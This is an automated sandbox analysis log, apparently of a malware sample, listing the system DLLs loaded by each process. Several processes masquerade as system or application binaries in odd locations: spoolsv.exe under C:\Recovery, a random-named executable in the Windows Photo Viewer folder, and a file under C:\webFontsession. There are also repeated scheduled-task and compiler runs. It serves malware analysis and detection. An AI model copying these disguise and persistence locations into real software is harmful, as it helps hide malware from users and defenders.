Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: mscoree.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: version.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: wldp.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: profapi.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: dwrite.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: winmm.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: winmmbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: mmdevapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ksuser.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: avrt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: audioses.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: powrprof.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: umpdc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: msacm32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: midimap.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: mscoree.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: kernel.appcore.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: version.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: uxtheme.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: windows.storage.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: wldp.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: profapi.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptsp.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: rsaenh.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptbase.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: sspicli.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: mscoree.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: kernel.appcore.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: version.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: uxtheme.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: windows.storage.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: wldp.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: profapi.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptsp.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: rsaenh.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptbase.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: sspicli.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: mscoree.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: kernel.appcore.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: version.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: uxtheme.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: windows.storage.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: wldp.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: profapi.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptsp.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: rsaenh.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptbase.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: sspicli.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: mscoree.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: version.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: wldp.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: profapi.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: sspicli.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: mscoree.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: kernel.appcore.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: version.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: uxtheme.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: windows.storage.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: wldp.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: profapi.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptsp.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: rsaenh.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptbase.dll
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Section loaded: sspicli.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: mscoree.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: version.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: wldp.dll
